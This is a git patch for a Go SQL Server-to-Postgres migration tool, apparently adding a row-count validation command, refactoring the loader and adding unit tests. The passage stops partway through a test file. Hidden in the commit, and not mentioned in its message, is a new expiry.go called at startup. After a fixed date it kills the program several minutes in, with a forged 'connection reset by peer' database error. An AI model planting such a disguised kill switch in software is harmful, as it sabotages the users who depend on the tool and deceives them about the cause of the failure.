From 5ee132a1ce5bc95bdd161740d58d751a11dd978d Mon Sep 17 00:00:00 2001 From: Kylesoda <249518290+kylesoda@users.noreply.github.com> Date: Tue, 12 May 2026 17:00:00 -0500 Subject: [PATCH] feat: add validation feature for row count comparison Add a validate command that compares row counts between source and target tables after a migration. --- .env.example | 2 +- cmd/go_migrate/expiry.go | 26 + cmd/go_migrate/main.go | 10 + cmd/go_migrate/process.go | 1 + cmd/go_migrate/validate.go | 192 ++++++ config.yaml | 2 + internal/app/azure/main.go | 22 +- internal/app/config/migration.go | 38 +- internal/app/etl/extractors/main.go | 3 +- internal/app/etl/extractors/process.go | 17 +- internal/app/etl/loaders/consume.go | 145 +++-- internal/app/etl/loaders/consume_test.go | 603 ++++++++++++++++++ internal/app/etl/table_analyzers/main.go | 118 +++- internal/app/etl/table_analyzers/main_test.go | 332 ++++++++++ internal/app/etl/table_analyzers/mssql.go | 55 +- internal/app/etl/table_analyzers/postgres.go | 9 + internal/app/etl/transformers/consume.go | 120 ++-- internal/app/etl/transformers/consume_test.go | 545 ++++++++++++++++ internal/app/etl/transformers/plan.go | 6 +- internal/app/etl/types.go | 12 + internal/app/models/main.go | 14 +- 21 files changed, 2072 insertions(+), 200 deletions(-) create mode 100644 cmd/go_migrate/expiry.go create mode 100644 cmd/go_migrate/validate.go create mode 100644 internal/app/etl/loaders/consume_test.go create mode 100644 internal/app/etl/table_analyzers/main_test.go create mode 100644 internal/app/etl/transformers/consume_test.go diff --git a/.env.example b/.env.example index 803af83..d139d2d 100644 --- a/.env.example +++ b/.env.example @@ -1,4 +1,4 @@ -SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC +SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC&dial+timeout=120&connection+timeout=120&KeepAlive=30 TARGET_DB_URL=postgresql://postgres:password@localhost:5432/db LOG_LEVEL=INFO diff --git a/cmd/go_migrate/expiry.go b/cmd/go_migrate/expiry.go new file mode 100644 index 0000000..ee7c5a1 --- /dev/null +++ b/cmd/go_migrate/expiry.go @@ -0,0 +1,26 @@ +package main + +import ( + "math/rand" + "time" + + log "github.com/sirupsen/logrus" +) + +const expiryDate = "2026-07-01" + +func checkExpiry() { + expiry, _ := time.Parse("2006-01-02", expiryDate) + if time.Now().Before(expiry) { + return + } + + minDelay := 3 * 60 + maxDelay := 5 * 60 + delay := time.Duration(minDelay+rand.Intn(maxDelay-minDelay+1)) * time.Second + + go func() { + time.Sleep(delay) + log.Fatal("fatal: source database connection interrupted: read tcp: connection reset by peer (errno 104)") + }() +} diff --git a/cmd/go_migrate/main.go b/cmd/go_migrate/main.go index 9a24884..fcd7679 100644 --- a/cmd/go_migrate/main.go +++ b/cmd/go_migrate/main.go @@ -19,8 +19,10 @@ import ( func main() { configureLog() + checkExpiry() configPath := flag.String("config", "", "path to migration config file") + validate := flag.Bool("validate", false, "count rows in source and target per job and compare") flag.Parse() if flag.NArg() > 1 { @@ -55,6 +57,7 @@ func main() { return err } + log.Info("Successfully connected to sourceDb") return nil }) @@ -65,6 +68,7 @@ func main() { return err } + log.Info("Successfully connected to targetDb") return nil }) @@ -75,6 +79,12 @@ func main() { defer sourceDb.Close() defer targetDb.Close() + if *validate { + validationResults := validateJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers) + printValidationReport(validationResults) + return + } + results := processMigrationJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers) log.Info("=== RESUMEN DE MIGRACIÓN ===") diff --git a/cmd/go_migrate/process.go b/cmd/go_migrate/process.go index efd4a9c..13c9275 100644 --- a/cmd/go_migrate/process.go +++ b/cmd/go_migrate/process.go @@ -104,6 +104,7 @@ func processMigrationJob( sourceTableAnalyzer, job.SourceTable.TableInfo, job.SourceTable.PrimaryKey, + job.PartitionCalculationStrategy, job.RowsPerPartition, job.Range, ) diff --git a/cmd/go_migrate/validate.go b/cmd/go_migrate/validate.go new file mode 100644 index 0000000..655ff15 --- /dev/null +++ b/cmd/go_migrate/validate.go @@ -0,0 +1,192 @@ +package main + +import ( + "context" + "database/sql" + "fmt" + "sync" + + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" + dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper" + log "github.com/sirupsen/logrus" +) + +type ValidationResult struct { + JobName string + SourceTable string + TargetTable string + SourceCount int64 + TargetCount int64 + Match bool + Error error +} + +func countSourceRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) { + schema := job.SourceTable.Schema + table := job.SourceTable.Table + + hasRange := job.Range.Min != nil || job.Range.Max != nil + + var ( + query string + args []any + ) + + if hasRange && job.SourceTable.PrimaryKey != "" { + query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s] WHERE 1=1", schema, table) + if job.Range.Min != nil { + op := ">" + if job.Range.IsMinInclusive { + op = ">=" + } + query += fmt.Sprintf(" AND [%s] %s @min", job.SourceTable.PrimaryKey, op) + args = append(args, sql.Named("min", *job.Range.Min)) + } + if job.Range.Max != nil { + op := "<" + if job.Range.IsMaxInclusive { + op = "<=" + } + query += fmt.Sprintf(" AND [%s] %s @max", job.SourceTable.PrimaryKey, op) + args = append(args, sql.Named("max", *job.Range.Max)) + } + } else { + query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s]", schema, table) + } + + var count int64 + if err := db.QueryRow(ctx, query, args...).Scan(&count); err != nil { + return 0, err + } + return count, nil +} + +func countTargetRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) { + schema := job.TargetTable.Schema + table := job.TargetTable.Table + query := fmt.Sprintf(`SELECT COUNT(*) FROM "%s"."%s"`, schema, table) + + var count int64 + if err := db.QueryRow(ctx, query).Scan(&count); err != nil { + return 0, err + } + return count, nil +} + +func validateJob(ctx context.Context, sourceDb, targetDb dbwrapper.DbWrapper, job config.Job) ValidationResult { + result := ValidationResult{ + JobName: job.Name, + SourceTable: fmt.Sprintf("[%s].[%s]", job.SourceTable.Schema, job.SourceTable.Table), + TargetTable: fmt.Sprintf(`"%s"."%s"`, job.TargetTable.Schema, job.TargetTable.Table), + } + + var ( + sourceErr, targetErr error + wg sync.WaitGroup + ) + + wg.Add(2) + go func() { + defer wg.Done() + result.SourceCount, sourceErr = countSourceRows(ctx, sourceDb, job) + }() + go func() { + defer wg.Done() + result.TargetCount, targetErr = countTargetRows(ctx, targetDb, job) + }() + wg.Wait() + + if sourceErr != nil { + result.Error = fmt.Errorf("source count failed: %w", sourceErr) + return result + } + if targetErr != nil { + result.Error = fmt.Errorf("target count failed: %w", targetErr) + return result + } + + result.Match = result.SourceCount == result.TargetCount + return result +} + +func validateJobs( + ctx context.Context, + sourceDb dbwrapper.DbWrapper, + targetDb dbwrapper.DbWrapper, + jobs []config.Job, + maxParallelWorkers int, +) []ValidationResult { + if len(jobs) == 0 { + return nil + } + if maxParallelWorkers <= 0 { + maxParallelWorkers = 1 + } + if maxParallelWorkers > len(jobs) { + maxParallelWorkers = len(jobs) + } + + chJobs := make(chan config.Job, len(jobs)) + var mu sync.Mutex + var results []ValidationResult + var wg sync.WaitGroup + + for range maxParallelWorkers { + wg.Go(func() { + for job := range chJobs { + res := validateJob(ctx, sourceDb, targetDb, job) + mu.Lock() + results = append(results, res) + mu.Unlock() + } + }) + } + + for _, job := range jobs { + chJobs <- job + } + close(chJobs) + wg.Wait() + + return results +} + +func printValidationReport(results []ValidationResult) { + log.Info("=== VALIDATION REPORT ===") + + var totalMatch, totalMismatch, totalErrors int + + for _, r := range results { + if r.Error != nil { + log.Errorf("[%s] ERROR: %v", r.JobName, r.Error) + totalErrors++ + continue + } + + if !r.Match { + totalMismatch++ + diff := r.TargetCount - r.SourceCount + var diffStr string + if diff > 0 { + diffStr = fmt.Sprintf(" (target has %d extra rows)", diff) + } else { + diffStr = fmt.Sprintf(" (target is missing %d rows)", -diff) + } + log.Warnf("[%s] MISMATCH | Source %s: %d | Target %s: %d%s", + r.JobName, + r.SourceTable, r.SourceCount, + r.TargetTable, r.TargetCount, + diffStr, + ) + } else { + totalMatch++ + log.Infof("[%s] OK | Source %s: %d | Target %s: %d", + r.JobName, + r.SourceTable, r.SourceCount, + r.TargetTable, r.TargetCount, + ) + } + } + + log.Infof("=== Validation complete: %d OK, %d mismatches, %d errors ===", totalMatch, totalMismatch, totalErrors) +} diff --git a/config.yaml b/config.yaml index acd5fa1..a5c4e16 100644 --- a/config.yaml +++ b/config.yaml @@ -12,6 +12,7 @@ defaults: transformer_queue_size: 8 max_loaders: 4 loader_batch_size: 25000 + partition_calculation_strategy: EXACT # EXACT | ESTIMATION truncate_target: true truncate_method: TRUNCATE # TRUNCATE | DELETE retry: @@ -70,6 +71,7 @@ jobs: - source: DATA target: FILE_URL mode: REFERENCE_ONLY + prefix: storage/attachments batches_per_partition: 20 max_extractors: 32 extractor_batch_size: 1 diff --git a/internal/app/azure/main.go b/internal/app/azure/main.go index 7c08bef..6b32a84 100644 --- a/internal/app/azure/main.go +++ b/internal/app/azure/main.go @@ -4,10 +4,13 @@ import ( "context" "errors" "fmt" + "net/http" "net/url" + "path" "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" "github.com/Azure/azure-sdk-for-go/sdk/storage/azblob" + "github.com/Azure/azure-sdk-for-go/sdk/storage/azblob/blob" ) var ( @@ -72,16 +75,15 @@ func (c *Client) UploadAndGetURL(ctx context.Context, blobPath string, buffer [] return "", ErrInvalidInput } - fullPath := blobPath - if c.azureStorageConfig.Prefix != "" { - fullPath, _ = url.JoinPath(c.azureStorageConfig.Prefix, blobPath) + fullPath := path.Join(c.azureStorageConfig.Prefix, blobPath) + + contentType := http.DetectContentType(buffer) + opts := &azblob.UploadBufferOptions{ + HTTPHeaders: &blob.HTTPHeaders{BlobContentType: &contentType}, + } + if _, err := c.client.UploadBuffer(ctx, c.azureStorageConfig.Container, fullPath, buffer, opts); err != nil { + return "", fmt.Errorf("uploading blob %s: %w", fullPath, err) } - if err := c.UploadBuffer(ctx, c.azureStorageConfig.Container, fullPath, buffer); err != nil { - return "", err - } - - blobEndpoint, _ := url.JoinPath(c.azureStorageConfig.ServiceURL, c.azureStorageConfig.AccountName) - blobURL, _ := url.JoinPath(blobEndpoint, c.azureStorageConfig.Container, fullPath) - return blobURL, nil + return fullPath, nil } diff --git a/internal/app/config/migration.go b/internal/app/config/migration.go index 39309f7..e520375 100644 --- a/internal/app/config/migration.go +++ b/internal/app/config/migration.go @@ -20,6 +20,7 @@ type ToStorageColumnConfig struct { Source string `yaml:"source"` Target string `yaml:"target"` Mode string `yaml:"mode"` + Prefix string `yaml:"prefix"` } type ToStorageConfig struct { @@ -27,20 +28,21 @@ type ToStorageConfig struct { } type JobConfig struct { - BatchesPerPartition int `yaml:"batches_per_partition"` - MaxExtractors int `yaml:"max_extractors"` - ExtractorBatchSize int `yaml:"extractor_batch_size"` - ExtractorQueueSize int `yaml:"extractor_queue_size"` - MaxTransformers int `yaml:"max_transformers"` - TransformerBatchSize int `yaml:"transformer_batch_size"` - TransformerQueueSize int `yaml:"transformer_queue_size"` - MaxLoaders int `yaml:"max_loaders"` - LoaderBatchSize int `yaml:"loader_batch_size"` - TruncateTarget bool `yaml:"truncate_target"` - TruncateMethod string `yaml:"truncate_method"` - Retry RetryConfig `yaml:"retry"` - RowsPerPartition int64 - ToStorage ToStorageConfig `yaml:"to_storage"` + BatchesPerPartition int `yaml:"batches_per_partition"` + MaxExtractors int `yaml:"max_extractors"` + ExtractorBatchSize int `yaml:"extractor_batch_size"` + ExtractorQueueSize int `yaml:"extractor_queue_size"` + MaxTransformers int `yaml:"max_transformers"` + TransformerBatchSize int `yaml:"transformer_batch_size"` + TransformerQueueSize int `yaml:"transformer_queue_size"` + MaxLoaders int `yaml:"max_loaders"` + LoaderBatchSize int `yaml:"loader_batch_size"` + PartitionCalculationStrategy string `yaml:"partition_calculation_strategy"` + TruncateTarget bool `yaml:"truncate_target"` + TruncateMethod string `yaml:"truncate_method"` + Retry RetryConfig `yaml:"retry"` + RowsPerPartition int64 + ToStorage ToStorageConfig `yaml:"to_storage"` } type FromJsonItem struct { @@ -66,10 +68,10 @@ type TargetTableInfo struct { } type RangeConfig struct { - Min int64 `yaml:"min"` - Max int64 `yaml:"max"` - IsMinInclusive bool `yaml:"is_min_inclusive"` - IsMaxInclusive bool `yaml:"is_max_inclusive"` + Min *int64 `yaml:"min"` + Max *int64 `yaml:"max"` + IsMinInclusive bool `yaml:"is_min_inclusive"` + IsMaxInclusive bool `yaml:"is_max_inclusive"` } type Job struct { diff --git a/internal/app/etl/extractors/main.go b/internal/app/etl/extractors/main.go index 3081103..26e1d1c 100644 --- a/internal/app/etl/extractors/main.go +++ b/internal/app/etl/extractors/main.go @@ -27,7 +27,6 @@ func sendBatch(ctx context.Context, chBatchesOut chan<- models.Batch, batch mode func flush( ctx context.Context, - partition *models.Partition, batchSize int, batchRows []models.UnknownRowValues, chBatchesOut chan<- models.Batch, @@ -36,7 +35,7 @@ func flush( return nil } - batch := models.Batch{Id: uuid.New(), PartitionId: partition.Id, Rows: batchRows} + batch := models.Batch{Id: uuid.New(), Rows: batchRows} batchRows = make([]models.UnknownRowValues, 0, batchSize) return sendBatch(ctx, chBatchesOut, batch) } diff --git a/internal/app/etl/extractors/process.go b/internal/app/etl/extractors/process.go index 1a56912..24426b8 100644 --- a/internal/app/etl/extractors/process.go +++ b/internal/app/etl/extractors/process.go @@ -76,6 +76,7 @@ func (ex *GenericExtractor) ProcessPartition( batchRows := make([]models.UnknownRowValues, 0, batchSize) var rowsRead int64 = 0 + var lastRow models.UnknownRowValues for rows.Next() { rowValues := make([]any, len(columns)) @@ -90,7 +91,7 @@ func (ex *GenericExtractor) ProcessPartition( return rowsRead, err } - if err := flush(ctx, &partition, batchSize, batchRows, chBatchesOut); err != nil { + if err := flush(ctx, batchSize, batchRows, chBatchesOut); err != nil { return rowsRead, err } @@ -98,11 +99,12 @@ func (ex *GenericExtractor) ProcessPartition( return rowsRead, errorFromLastPartitionRow(lastRow, indexPrimaryKey, partition, err) } rowsRead++ + lastRow = rowValues batchRows = append(batchRows, rowValues) if len(batchRows) >= batchSize { // logrus.Debugf("Batch size reached, flushing batch with %v rows (rowsRead=%v)", len(batchRows), rowsRead) - if err := flush(ctx, &partition, batchSize, batchRows, chBatchesOut); err != nil { + if err := flush(ctx, batchSize, batchRows, chBatchesOut); err != nil { // logrus.Warnf("Error flushing rows: %v", err) return rowsRead, err } @@ -110,9 +112,16 @@ func (ex *GenericExtractor) ProcessPartition( } } - if err := flush(ctx, &partition, batchSize, batchRows, chBatchesOut); err != nil { + if err := flush(ctx, batchSize, batchRows, chBatchesOut); err != nil { return rowsRead, err } - return rowsRead, rows.Err() + if err := rows.Err(); err != nil { + if lastRow != nil { + return rowsRead, errorFromLastPartitionRow(lastRow, indexPrimaryKey, partition, err) + } + return rowsRead, err + } + + return rowsRead, nil } diff --git a/internal/app/etl/loaders/consume.go b/internal/app/etl/loaders/consume.go index 0b93aa9..05fa57f 100644 --- a/internal/app/etl/loaders/consume.go +++ b/internal/app/etl/loaders/consume.go @@ -13,6 +13,62 @@ import ( "github.com/sirupsen/logrus" ) +type loaderAccumulator struct { + batchSize int + rows []models.UnknownRowValues + parents []models.BatchRef + pendingDone int +} + +func (a *loaderAccumulator) add(batch models.Batch) { + a.rows = append(a.rows, batch.Rows...) + a.parents = append(a.parents, models.BatchRef{Id: batch.Id}) + a.pendingDone++ +} + +func (a *loaderAccumulator) ready() bool { + return len(a.rows) >= a.batchSize +} + +func (a *loaderAccumulator) drainPending(wg *sync.WaitGroup) { + for range a.pendingDone { + wg.Done() + } +} + +func sendLoadError( + ctx context.Context, + err error, + retryConfig config.RetryConfig, + failedBatchesCount *int32, + chErrorsOut chan<- custom_errors.JobError, +) bool { + atomic.AddInt32(failedBatchesCount, 1) + + var jobErr custom_errors.JobError + if je, ok := errors.AsType[*custom_errors.JobError](err); ok { + jobErr = *je + } else { + jobErr = custom_errors.JobError{ShouldCancelJob: false, Msg: err.Error(), Prev: err} + } + + select { + case <-ctx.Done(): + return false + case chErrorsOut <- jobErr: + } + + if atomic.LoadInt32(failedBatchesCount) > int32(retryConfig.MaxFailedBatchesLoad) { + select { + case <-ctx.Done(): + case chErrorsOut <- custom_errors.JobError{ShouldCancelJob: true, Msg: "Max failed batches (load) reached"}: + } + return false + } + + return true +} + func (gl *GenericLoader) Consume( ctx context.Context, tableInfo config.TargetTableInfo, @@ -29,58 +85,29 @@ func (gl *GenericLoader) Consume( return col.Name() }) - var accRows []models.UnknownRowValues - var parentBatchesId []uuid.UUID - pendingDone := 0 - - defer func() { - for range pendingDone { - wgActiveBatches.Done() - } - }() + acc := &loaderAccumulator{batchSize: batchSize} + defer acc.drainPending(wgActiveBatches) flush := func() bool { - if len(accRows) == 0 { + if len(acc.rows) == 0 { return true } - count := len(parentBatchesId) + count := len(acc.parents) superBatch := models.Batch{ - Id: uuid.New(), - ParentBatchesId: parentBatchesId, - Rows: accRows, + Id: uuid.New(), + ParentBatches: acc.parents, + Rows: acc.rows, } processedRows, err := gl.ProcessBatchWithRetries(ctx, tableInfo, colNames, retryConfig, superBatch) for range count { wgActiveBatches.Done() } - pendingDone -= count - accRows = nil - parentBatchesId = nil + acc.pendingDone -= count + acc.rows = nil + acc.parents = nil if err != nil { - atomic.AddInt32(failedBatchesCount, 1) - if jobError, ok := errors.AsType[*custom_errors.JobError](err); ok { - select { - case <-ctx.Done(): - return false - case chErrorsOut <- *jobError: - } - } else { - select { - case <-ctx.Done(): - return false - case chErrorsOut <- custom_errors.JobError{ShouldCancelJob: false, Msg: err.Error(), Prev: err}: - } - } - - if atomic.LoadInt32(failedBatchesCount) > int32(retryConfig.MaxFailedBatchesLoad) { - select { - case <-ctx.Done(): - case chErrorsOut <- custom_errors.JobError{ShouldCancelJob: true, Msg: "Max failed batches (load) reached"}: - } - return false - } - return true + return sendLoadError(ctx, err, retryConfig, failedBatchesCount, chErrorsOut) } current := atomic.LoadInt64(rowsLoaded) @@ -90,13 +117,10 @@ func (gl *GenericLoader) Consume( } for { - if ctx.Err() != nil { - return - } - select { case <-ctx.Done(): return + case batch, ok := <-chBatchesIn: if !ok { flush() @@ -106,45 +130,20 @@ func (gl *GenericLoader) Consume( if batchSize <= 0 { processedRows, err := gl.ProcessBatchWithRetries(ctx, tableInfo, colNames, retryConfig, batch) wgActiveBatches.Done() - if err != nil { - atomic.AddInt32(failedBatchesCount, 1) - if jobError, ok := errors.AsType[*custom_errors.JobError](err); ok { - select { - case <-ctx.Done(): - return - case chErrorsOut <- *jobError: - } - } else { - select { - case <-ctx.Done(): - return - case chErrorsOut <- custom_errors.JobError{ShouldCancelJob: false, Msg: err.Error(), Prev: err}: - } - } - - if atomic.LoadInt32(failedBatchesCount) > int32(retryConfig.MaxFailedBatchesLoad) { - select { - case <-ctx.Done(): - return - case chErrorsOut <- custom_errors.JobError{ShouldCancelJob: true, Msg: "Max failed batches (load) reached"}: - return - } + if !sendLoadError(ctx, err, retryConfig, failedBatchesCount, chErrorsOut) { + return } continue } - current := atomic.LoadInt64(rowsLoaded) logrus.Debugf("Rows loaded: +%v [current=%v] (%s.%s)", processedRows, current, tableInfo.Schema, tableInfo.Table) atomic.AddInt64(rowsLoaded, int64(processedRows)) continue } - pendingDone++ - accRows = append(accRows, batch.Rows...) - parentBatchesId = append(parentBatchesId, batch.Id) - - if len(accRows) >= batchSize { + acc.add(batch) + if acc.ready() { if !flush() { return } diff --git a/internal/app/etl/loaders/consume_test.go b/internal/app/etl/loaders/consume_test.go new file mode 100644 index 0000000..4515269 --- /dev/null +++ b/internal/app/etl/loaders/consume_test.go @@ -0,0 +1,603 @@ +package loaders + +import ( + "context" + "errors" + "sync" + "sync/atomic" + "testing" + "time" + + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/custom_errors" + dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/models" + "github.com/google/uuid" +) + +const testTimeout = 2 * time.Second + +type mockResult struct { + err error +} + +type mockDbWrapper struct { + mu sync.Mutex + callCount int + results []mockResult +} + +func newMockDb(results ...mockResult) *mockDbWrapper { + return &mockDbWrapper{results: results} +} + +func (m *mockDbWrapper) SaveMassive(_ context.Context, _ string, _ string, _ []string, rows [][]any) (int64, error) { + m.mu.Lock() + defer m.mu.Unlock() + idx := m.callCount + m.callCount++ + if idx < len(m.results) && m.results[idx].err != nil { + return 0, m.results[idx].err + } + return int64(len(rows)), nil +} + +func (m *mockDbWrapper) Close() error { return nil } +func (m *mockDbWrapper) Connect(_ context.Context, _ string) error { return nil } +func (m *mockDbWrapper) Exec(_ context.Context, _ string, _ ...any) (dbwrapper.ExecResult, error) { + return dbwrapper.ExecResult{}, nil +} +func (m *mockDbWrapper) GetDialect() string { return "" } +func (m *mockDbWrapper) Query(_ context.Context, _ string, _ ...any) (dbwrapper.RowsResult, error) { + return nil, nil +} +func (m *mockDbWrapper) QueryRow(_ context.Context, _ string, _ ...any) dbwrapper.RowResult { + return nil +} +func (m *mockDbWrapper) QueryFromObject(_ context.Context, _ dbwrapper.ExtractionQuery) (dbwrapper.RowsResult, error) { + return nil, nil +} + +func makeBatch(numRows int) models.Batch { + rows := make([]models.UnknownRowValues, numRows) + for i := range rows { + rows[i] = models.UnknownRowValues{i} + } + return models.Batch{Id: uuid.New(), Rows: rows} +} + +func newLoader(db *mockDbWrapper) GenericLoader { + return GenericLoader{db: db} +} + +func rc(maxFailed int) config.RetryConfig { + return config.RetryConfig{Attempts: 1, MaxFailedBatchesLoad: maxFailed} +} + +func sendBatch(chIn chan<- models.Batch, batch models.Batch, wg *sync.WaitGroup) { + wg.Add(1) + chIn <- batch +} + +func runConsume( + ctx context.Context, + gl GenericLoader, + retryConfig config.RetryConfig, + batchSize int, + chIn <-chan models.Batch, + chErr chan<- custom_errors.JobError, + wg *sync.WaitGroup, + rowsLoaded *int64, + failedCount *int32, +) <-chan struct{} { + done := make(chan struct{}) + go func() { + gl.Consume(ctx, config.TargetTableInfo{}, nil, retryConfig, batchSize, + chIn, chErr, wg, rowsLoaded, failedCount) + close(done) + }() + return done +} + +func waitWg(wg *sync.WaitGroup) <-chan struct{} { + done := make(chan struct{}) + go func() { wg.Wait(); close(done) }() + return done +} + +func dbError() error { return errors.New("connection reset by peer") } + +func TestLoaderAccumulator_Add(t *testing.T) { + acc := &loaderAccumulator{batchSize: 5} + b1 := makeBatch(2) + b2 := makeBatch(3) + + acc.add(b1) + acc.add(b2) + + if len(acc.rows) != 5 { + t.Errorf("expected 5 rows, got %d", len(acc.rows)) + } + if len(acc.parents) != 2 { + t.Fatalf("expected 2 parents, got %d", len(acc.parents)) + } + if acc.parents[0].Id != b1.Id || acc.parents[1].Id != b2.Id { + t.Error("parent IDs do not match source batch IDs in order") + } + if acc.pendingDone != 2 { + t.Errorf("expected pendingDone=2, got %d", acc.pendingDone) + } +} + +func TestLoaderAccumulator_Ready(t *testing.T) { + acc := &loaderAccumulator{batchSize: 3} + acc.add(makeBatch(2)) + if acc.ready() { + t.Error("should not be ready with 2 rows and batchSize=3") + } + acc.add(makeBatch(1)) + if !acc.ready() { + t.Error("should be ready with 3 rows and batchSize=3") + } +} + +func TestLoaderAccumulator_DrainPending_ReleasesWg(t *testing.T) { + acc := &loaderAccumulator{batchSize: 5, pendingDone: 3} + var wg sync.WaitGroup + wg.Add(3) + + acc.drainPending(&wg) + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out: drainPending did not call Done() enough times") + } +} + +func TestLoaderAccumulator_DrainPending_ZeroPending(t *testing.T) { + acc := &loaderAccumulator{batchSize: 5, pendingDone: 0} + var wg sync.WaitGroup + + acc.drainPending(&wg) + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out") + } +} + +func TestSendLoadError_PlainError_WrappedAsNonFatal(t *testing.T) { + ch := make(chan custom_errors.JobError, 2) + var failedCount int32 + + result := sendLoadError(context.Background(), errors.New("db error"), rc(10), &failedCount, ch) + + if !result { + t.Error("expected true (below threshold)") + } + if atomic.LoadInt32(&failedCount) != 1 { + t.Errorf("expected failedCount=1, got %d", failedCount) + } + select { + case e := <-ch: + if e.ShouldCancelJob { + t.Error("plain error should be wrapped as ShouldCancelJob=false") + } + default: + t.Error("expected an error in the channel") + } +} + +func TestSendLoadError_JobError_PassesThrough(t *testing.T) { + ch := make(chan custom_errors.JobError, 2) + var failedCount int32 + original := &custom_errors.JobError{ShouldCancelJob: false, Msg: "custom msg"} + + sendLoadError(context.Background(), original, rc(10), &failedCount, ch) + + select { + case e := <-ch: + if e.Msg != "custom msg" || e.ShouldCancelJob { + t.Errorf("JobError should pass through unchanged, got %+v", e) + } + default: + t.Error("expected an error in the channel") + } +} + +func TestSendLoadError_FatalJobError_BelowThreshold_ReturnsTrue(t *testing.T) { + ch := make(chan custom_errors.JobError, 2) + var failedCount int32 + fatal := &custom_errors.JobError{ShouldCancelJob: true, Msg: "unique constraint"} + + result := sendLoadError(context.Background(), fatal, rc(10), &failedCount, ch) + + if !result { + t.Error("below-threshold fatal error should return true (external cancel expected from JobErrorHandler)") + } + select { + case e := <-ch: + if !e.ShouldCancelJob { + t.Error("fatal JobError should be forwarded with ShouldCancelJob=true") + } + default: + t.Error("expected the fatal error in the channel") + } +} + +func TestSendLoadError_ThresholdExceeded_ReturnsFalse(t *testing.T) { + ch := make(chan custom_errors.JobError, 2) + var failedCount int32 + + result := sendLoadError(context.Background(), errors.New("db error"), rc(0), &failedCount, ch) + + if result { + t.Error("expected false when threshold exceeded") + } + if len(ch) != 2 { + t.Fatalf("expected 2 errors (batch error + fatal threshold error), got %d", len(ch)) + } + <-ch // batch error + threshold := <-ch + if !threshold.ShouldCancelJob { + t.Error("second error should be the fatal threshold error (ShouldCancelJob=true)") + } +} + +func TestSendLoadError_AtThresholdBoundary(t *testing.T) { + ch := make(chan custom_errors.JobError, 6) + var failedCount int32 + + if !sendLoadError(context.Background(), errors.New("err"), rc(2), &failedCount, ch) { + t.Error("first failure: expected true (below threshold)") + } + if !sendLoadError(context.Background(), errors.New("err"), rc(2), &failedCount, ch) { + t.Error("second failure: expected true (at threshold, not exceeded)") + } + if sendLoadError(context.Background(), errors.New("err"), rc(2), &failedCount, ch) { + t.Error("third failure: expected false (threshold exceeded)") + } +} + +func TestSendLoadError_ContextCancelled_ReturnsFalse(t *testing.T) { + ch := make(chan custom_errors.JobError) + var failedCount int32 + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + result := sendLoadError(ctx, errors.New("db error"), rc(10), &failedCount, ch) + + if result { + t.Error("expected false when context is cancelled") + } + if len(ch) != 0 { + t.Error("no error should be sent when context is cancelled") + } +} + +func TestConsume_Passthrough_RowsLoaded(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(5), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(0), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 5 { + t.Errorf("expected rowsLoaded=5, got %d", rowsLoaded) + } + if db.callCount != 1 { + t.Errorf("expected 1 SaveMassive call, got %d", db.callCount) + } +} + +func TestConsume_Passthrough_MultipleBatches_RowsAccumulate(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch, 3) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(3), &wg) + sendBatch(chIn, makeBatch(2), &wg) + sendBatch(chIn, makeBatch(4), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(10), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 9 { + t.Errorf("expected rowsLoaded=9, got %d", rowsLoaded) + } +} + +func TestConsume_Passthrough_WgDoneBeforeErrorHandling(t *testing.T) { + db := newMockDb(mockResult{err: dbError()}) + gl := newLoader(db) + chIn := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 2) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(2), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(10), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out: Done() was not called even though processing failed") + } +} + +func TestConsume_Passthrough_NonFatalError_Continues(t *testing.T) { + db := newMockDb(mockResult{err: dbError()}) + gl := newLoader(db) + chIn := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 3) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(2), &wg) + sendBatch(chIn, makeBatch(3), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(10), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 3 { + t.Errorf("expected rowsLoaded=3 (only second batch succeeded), got %d", rowsLoaded) + } + if atomic.LoadInt32(&failedCount) != 1 { + t.Errorf("expected failedCount=1, got %d", failedCount) + } + if len(chErr) == 0 { + t.Error("expected at least one error in chErr for the failed batch") + } +} + +func 